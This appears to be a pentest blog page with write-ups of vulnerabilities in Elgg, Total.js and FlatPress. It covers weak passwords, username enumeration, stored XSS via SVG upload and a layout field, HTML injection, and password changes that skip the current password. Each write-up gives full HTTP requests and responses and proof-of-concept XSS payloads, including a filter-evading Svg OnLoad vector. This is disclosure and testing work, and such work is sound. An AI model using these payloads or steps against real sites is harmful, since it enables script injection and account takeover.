Saturday, 24 January 2026

Friday Fun Pentest Series - 48 - Weak Password Complexity - elggv6.3.3

 Description

- It was noted that the "Password Update" functionality allowed users to set weak passwords.


Weak Password Complexity

Steps to Reproduce:
  1. Visit profile page and change the password to "Passw0rd!"
// HTTP Request - Changing Password

POST /action/usersettings/save HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/settings/user/admin
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=nIY_M_wh53bUxoHvuKO1YA&__elgg_ts=1769266299&username=admin&name=Admin+User&email_password=&email=admin@example.com&current_password=[REDACTED]&password=Passw0rd%21&password2=Passw0rd%21&language=en&guid=46


// HTTP Response - Changing Password

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:52:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/settings/user/admin
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 394

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/settings/user/admin'" />

        <title>Redirecting to http://elgg.local/settings/user/admin</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/settings/user/admin">http://elgg.local/settings/user/admin</a>.
    </body>
</html>


// HTTP Request - Changing Password - Following Redirect

GET /settings/user/admin HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/usersettings/save
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i



// HTTP Response - Changing Password - Following Redirect

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:52:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27859

[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Password changed</div></div></div>
[...]

at No comments:

Friday Fun Pentest Series - 47 - Username Enumeration - elggv6.3.3

Description

- It was noted that the "Fogot Password" functionality was vulnerable to "Username Enumeration"

Username Enumeration

Steps to Reproduce:
  1. Enter valid user and observe HTTP response
  2. Enter invalid user and observer HTTP response

// HTTP Request - Resetting Password - Valid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin

// HTTP Response - Resetting Password - Valid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:14:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 318
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/'" />
        <title>Redirecting to http://elgg.local/</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/">http://elgg.local/</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Valid User

GET / HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Valid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:14:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20646
[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Successfully requested a new password, email sent</div></div></div>
[...]


// HTTP Request - Resetting Password - Invalid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x

// HTTP Response - Resetting Password - Invalid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:15:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/forgotpassword
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 374
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/forgotpassword'" />
        <title>Redirecting to http://elgg.local/forgotpassword</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/forgotpassword">http://elgg.local/forgotpassword</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Invalid User

GET /forgotpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Invalid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:15:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19681
[...]
<div class="elgg-message elgg-message-error"><div class="elgg-inner"><div class="elgg-body">Username x not found.</div></div></div>
[...]



at No comments:

Sunday, 26 October 2025

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description

- It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG image upload


Stored Cross-Site Scripting (XSS) via SVG File Upload


Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Visit "Files" and click "Upload"
  3. Upload SVG image file with the contents below
  4. The payload would execute upon clicking "Download"


// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--


// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]


// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>

at No comments:

Friday Fun Pentest Series - 45 - Stored HTML Injection - Layout Functionality - totaljsv5013

Description

- It was noted that the "Layout" functionality was vulnerable to Stored HTML Injection

Stored HTML Injection - Layout Functionality

Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Click on "Create" and enter name for the layout
  3. Trap the HTTP POST request and in the "html" parameter value enter the Stored HTML Injection payload below
  4. Upon visiting the newly created layout the payload would execute

<h1>HTMLi</h1>


// HTTP POST Request - Creating New Layout

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}}


// HTTP POST Response - Creating New Layout

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:41:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39

{"success":true,"value":"JE6c9M1cB61f"}


// HTTP GET Request - Triggering the Payload

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_html","data":{"id":"JE6c9M1cB61f"}}


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:46:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 60

{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}

at No comments:

Friday Fun Pentest Series - 44 - Stored Cross-Site Scripting (XSS) - Layout Functionality - totaljsv5013

Description

- It was noted that the "Layout" functionality was vulnerable to Stored Cross-Site Scripting (XSS) in the "html" parameter


Stored Cross-Site Scripting (XSS) - Layout Functionality

Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Click on "Create" and enter name for the layout
  3. Trap the HTTP POST request and in the "html" parameter value enter the Cross-Site Scripting (XSS) payload below
  4. Upon visiting the newly created layout the payload would execute

"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"


// HTTP POST Request - Creating New Layout

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}}


// HTTP POST Response - Creating New Layout

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:33:35 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39

{"success":true,"value":"JE6ar71cU61f"}


// HTTP GET Request - Triggering the Payload

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"layouts_html","data":{"id":"JE6ar71cU61f"}}



// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:39:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 117

{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}



at No comments:

Friday Fun Pentest Series - 43 - Current Password not Required When Changing Password - totaljsv5013

Description

- It was noted that the application password change functionality did not require the current password for the user to change their password


Current Password not Required When Changing Password

Steps to Reproduce:
  1. Login with user and click on profile icon
  2. Select "Change Credentials"
  3. The user would not be required to enter current password for updating their password

// HTTP POST Request - Changing Password

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"admin_save","data":{"name":"John Connor","login":"gz82g8WYq3","password":"Passw0rd!"}}


// HTTP Response - Changing Password

HTTP/1.1 200 OK
set-cookie: NPgdS=13030-39383d41540751460a15064b0f7449766a261756481745550d1f5f05414b061f5e6456343a630323750702160307415f584656405e390e3e38360e591d471c0619711511121d111f4f3a023530306156510b014f0d5045; Expires=Wed, 26 Nov 2025 16:25:39 GMT; Path=/; SameSite=Lax
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:25:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 16

{"success":true}

at No comments:

Sunday, 21 September 2025

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description

- It was noted that the application did not require the current password for the password change functionality


Current Password not Required when Changing Password #1:

Steps to Reproduce:

  1. Login with admin user and visit "Main" > "Configuration" > "General Settings"
  2. Current password would not be required when changing the password

// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]



at No comments:
Subscribe to: Comments (Atom)

Friday Fun Pentest Series - 48 - Weak Password Complexity - elggv6.3.3

  Description - It was noted that the "Password Update" functionality allowed users to set weak passwords. Weak Password Complexit...